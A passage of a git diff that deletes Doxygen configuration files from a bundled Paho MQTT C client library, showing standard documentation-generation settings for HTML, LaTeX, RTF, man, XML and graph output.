-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             = __attribute__(x)=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = YES
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI.in b/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI.in
deleted file mode 100644
index 482542f..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI.in
+++ /dev/null
@@ -1,1804 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "Paho MQTT C Client Library"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "@PROJECT_SOURCE_DIR@/doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "@CMAKE_CURRENT_BINARY_DIR@/doc/MQTTClient/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = /Users/dimitri/doxygen/mail/1.5.7/doxywizard/
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = NO
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
